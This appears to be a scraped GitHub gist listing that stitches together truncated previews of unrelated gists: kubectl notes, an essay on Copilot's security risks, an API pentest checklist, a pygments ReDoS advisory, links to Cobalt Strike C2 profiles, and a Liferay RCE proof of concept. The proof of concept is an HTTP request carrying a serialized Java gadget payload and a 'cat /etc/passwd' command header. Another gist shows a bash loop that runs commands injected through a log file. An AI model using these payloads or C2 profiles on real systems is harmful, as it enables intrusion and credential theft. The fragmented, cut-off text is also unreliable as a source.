Let's look at some basic kubectl output options.
Our intention is to list nodes (with their AWS InstanceId) and Pods (sorted by node).
We can start with:
kubectl get no
Magno Logan magnologan
sivaatluri567
/ kubectl.md
Created
September 3, 2021 13:46
— forked from so0k/kubectl.md
Playing with kubectl output
fr0gger
/ DhashIcon.py
Last active
September 30, 2024 11:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Thomas Roccia | IconDhash.py | |
| # pip3 install lief | |
| # pip3 install pillow | |
| # resource: https://www.hackerfactor.com/blog/?/archives/529-Kind-of-Like-That.html | |
| import lief | |
| import os | |
| import argparse |
0xabad1dea
/ copilot-risk-assessment.md
Last active
June 26, 2025 22:23
Risk Assessment of GitHub Copilot
this is a rough draft and may be updated with more examples
GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?
Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash | |
| $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' | |
| root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash | |
| root 11125 10680 17 21:27 pts/1 00:00:02 bash | |
| $ ls /proc/11125/fd | |
| total 0 | |
| dr-x------ 2 root root 0 Jun 28 21:27 . |
Folks, Leave me a comment / URL if something you like is missing!
| Resource | Description |
|---|---|
| Kube Academy | https://kube.academy/ |
| kuernetes-101 | https://kube.academy/courses/kubernetes-101/ |
| Docs Home | https://kubernetes.io/docs/home/ |
| CKS CKA CKAD Simulator | https://killer.sh/ |
juniotee
/ API_checklist.csv
Created
March 24, 2021 22:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ID | Test name | Domain | Owasp API Top Ten | |
|---|---|---|---|---|
| 1 | Test user enumeration (if applicable) | Authorization | A1, A3 | |
| 2 | Exploit vulnerabilities to gain unauthorized access | Authorization | A2 | |
| 3 | Transmission of sensitive information (token, credentials, etc.) in an insecure manner | Integrity/Confidentiality | A1 | |
| 4 | Test for specific data entry vulnerabilities | Data validation | A8 | |
| 5 | Perform fuzzing on all request parameters (sending malicious information, for example) | Data validation | A8 | |
| 6 | Test for injection vulnerabilities (SQLi, LDAP, XML, Xpath, XXE if applicable) | Data validation | A8 | |
| 7 | Testing for buffer overflow vulnerabilities | Data validation | A8 | |
| 8 | Test for logic failures (if applicable) | Data validation | A6 | |
| 9 | Test how the application behaves by receiving incomplete information | Data validation | A6 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Doyensec Vulnerability Advisory | |
| CVE-2021-27291 | |
| ======================================================================= | |
| * Regular Expression Denial of Service (REDoS) in pygments | |
| * Affected Product: pygments v1.1+, fixed in 2.7.4 | |
| * Vendor: https://github.com/pygments | |
| * Severity: Medium | |
| * Vulnerability Class: Denial of Service | |
| * Status: Fixed | |
| * Author(s): Ben Caller (Doyensec) |
joswr1ght
/ aws-us-east-1-iplist.sh
Created
February 16, 2021 18:57
Get AWS IP Addresses for a Specified Area
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | if .region == "us-east-1" then .ip_prefix else empty end' -r | head -3 |
MHaggis
/ malleable_c2_profiles
Last active
July 1, 2024 18:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| spawnto | |
| https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile | |
| https://raw.githubusercontent.com/kvcallfield/Cobalt-Strike-C2-profiles/cae44634d57c0d8a099e50f6d4e9b73acaaab9d6/amazon2.profile | |
| https://raw.githubusercontent.com/KevinCooper/24AF-CyberChallenge/67f531777f7912c7129f633f43e06fba79c5f3e2/CobaltStrike/cobalt.profile | |
| https://raw.githubusercontent.com/webcoderz/agressor-scripts-/950064776853cf4dd7403d0f75b5306fe275fcc3/Malleable-C2-Profiles-master/APT/meterpreter.profile | |
| https://raw.githubusercontent.com/hadesangel/Malleable-C2-Profiles/390937aec01e0bcdaf23312277e96e57ac925f7b/APT/meterpreter.profile | |
| https://raw.githubusercontent.com/ianxtianxt/Malleable-C2-Profiles/07fd3b45c4166c9aecdcfa54cddc905c22f6ff85/APT/meterpreter.profile | |
| https://raw.githubusercontent.com/seclib/Malleable-C2-Profiles/390937aec01e0bcdaf23312277e96e57ac925f7b/APT/meterpreter.profile | |
| https://raw.githubusercontent.com/rsmudge/Malleable-C2-Profiles/390937aec01e0bcdaf2331227 |
pikpikcu
/ LiferayRCE(CVE-2020-7961).md
Last active
September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63